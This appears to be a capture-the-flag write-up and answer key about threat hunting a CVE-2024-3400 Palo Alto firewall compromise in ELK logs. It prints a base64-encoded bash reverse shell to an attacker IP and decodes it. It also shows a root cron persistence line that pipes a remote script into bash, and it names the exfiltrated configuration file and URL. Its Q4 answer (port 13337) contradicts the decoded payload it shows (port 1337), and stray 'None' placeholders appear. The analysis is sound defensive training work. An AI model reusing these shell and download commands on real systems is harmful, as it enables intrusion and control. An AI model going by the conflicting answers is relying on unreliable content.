Reconstruct a Palo Alto RCE attack timeline by analyzing firewall logs in ELK, identifying initial access, reverse shell, persistence, and data exfiltration artifacts.

Category: Threat Hunting

Tactics: Reconnaissance, Initial Access, Execution, Persistence, Command and Control Exfiltration

Tool: ELK

Scenario

Palo Alto, a leading firewall vendor, has recently announced a critical vulnerability (CVE-2024–3400) that affects specific versions of its next-generation firewalls. This critical vulnerability enables remote attackers to gain unauthorized access and potentially take full control of affected systems. These firewalls are integral to your organization's network security, as they manage and monitor both inbound and outbound traffic, safeguarding against unauthorized access and various threats.

As a security analyst, your primary task is to accurately and swiftly determine whether any of the organization's systems are impacted by this newly disclosed vulnerability.

Q1 Identify the IP address of the first threat actor who gained unauthorized access to the environment.

None
None

Base64 decode: YmFzaCAtaSA+JiAvZGV2L3RjcC81NC4xNjIuMTY0LjIyLzEzMzcgMD4mMQ==

The IP address of the first threat actor who gained unauthorized access is: 54.162.164.22

Answer 54.162.164.22

Q2 Determine the date and time of the initial interaction between the threat actor and the target system. Format: 24h-UTC

None

The required format is 24-hour UTC.

Answer 2024–04–21 18:17:07

Q3 What is the command the threat actor used to achieve persistence on the machine?

None

using :

log.file.path:"/mnt/palo_alto3/var/log/syslog-system.log" 
and message:"*CMD*" 
and program:crond 
and (message:"*wget*" or message:"*bash*")

The expanded log shows the executed command:

(root) CMD (wget -qO- http://54.162.164.22/update | bash)

Because: It runs via crond ,Executes as root, Occurs at consistent minute marks ,Pulls remote script from attacker C2 ,Pipes directly into bash

Answer wget -qO- http://54.162.164.22/update | bash

Q4 What port was the first port used by one of the threat actors for the reverse shell?

From Question 1, the decoded base64 payload was:

bash -i >& /dev/tcp/54.162.164.22/1337 0>&1
bash -i >& /dev/tcp/54.162.164.22/1337 0>&1
                                   ↑
                                 PORT

To answer this properly, we focus on:

  1. First occurrence of a reverse shell pattern
  2. Format: /dev/tcp/IP/PORT
  3. Extract the PORT

Answer 13337

Q5 What was the name of the file one of the threat actors tried to exfiltrate?

Answer running-config.xml

Q6 What was the full URL the Threat actor used to access the exfiltrated content successfully?

None

Important observations: It returned 200 (success) It had a large response size It was accessed over HTTPS It originated from the attacker IP

Answer https://44.217.16.42/global-protect/bootstrap.min.css

https://cyberdefenders.org/blueteam-ctf-challenges/achievements/Napol/paloaltorce-uta0218/